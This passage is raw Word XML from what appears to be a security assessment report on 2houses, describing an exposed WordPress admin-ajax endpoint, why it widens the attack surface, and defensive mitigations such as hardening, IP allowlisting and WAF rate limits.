          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a classic "missing security header" finding — by itself it's Medium, but it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>compounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> FINDING-001 (JS-readable SSO tokens) and FINDING-006 (HTML-in-JSON XSS surface). Fixing all three is a package.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-008 — Live WordPress install behind or proxied by `www.2houses.com`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium — pending confirmation of which host actually handles the path  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack surface / unexpected tech stack  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>www.2houses.com/wp-admin/admin-ajax.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (exact backend host unknown)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Observed in unauthenticated bundle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The signup page at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a hardcoded form submission to a WordPress admin-ajax endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /wp-admin/admin-ajax.php?action=sptAjaxRecordConversion&amp;amp;sptID=5169</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>action=sptAjaxRecordConversion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sptID=5169</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — that's the "ShortPixel Tools" plugin or similar WordPress analytics tracker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This means either:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>www.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/wp-admin/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a WordPress host (likely), or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">There's a companion WordPress install (common candidates: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>blog.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2housesblog.be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>www-wp.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) that the Rails marketing site proxies to at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/wp-admin/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In either case, a WordPress install is reachable at a 2houses subdomain — and WordPress is one of the highest-surface attack targets on the internet (plugins, themes, xmlrpc, cron, admin panel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Why this matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WordPress admin-ajax on the public internet is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A prime target for plugin-specific CVEs (every popular plugin has a CVE history).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>An enumeration surface (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>?action=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>...) — some plugins expose user lists, post drafts, options via admin-ajax without auth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Frequently the victim of "zero-day drive-by" campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Knowing which plugin this originates from (sptAjaxRecordConversion → likely "Sales Performance Tracker" or an affiliate tracker) pins down CVE exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirm which host serves `/wp-admin/*`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and whether it's isolated from the Rails stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Update and harden that WordPress installation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep core + plugins auto-updated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Block `xmlrpc.php` and restrict `wp-admin/*`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allowlisted IPs if it's meant to be internal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ensure no shared admin credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between WordPress and Rails admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add a WAF rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to rate-limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>admin-ajax.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it's a common brute-force vector.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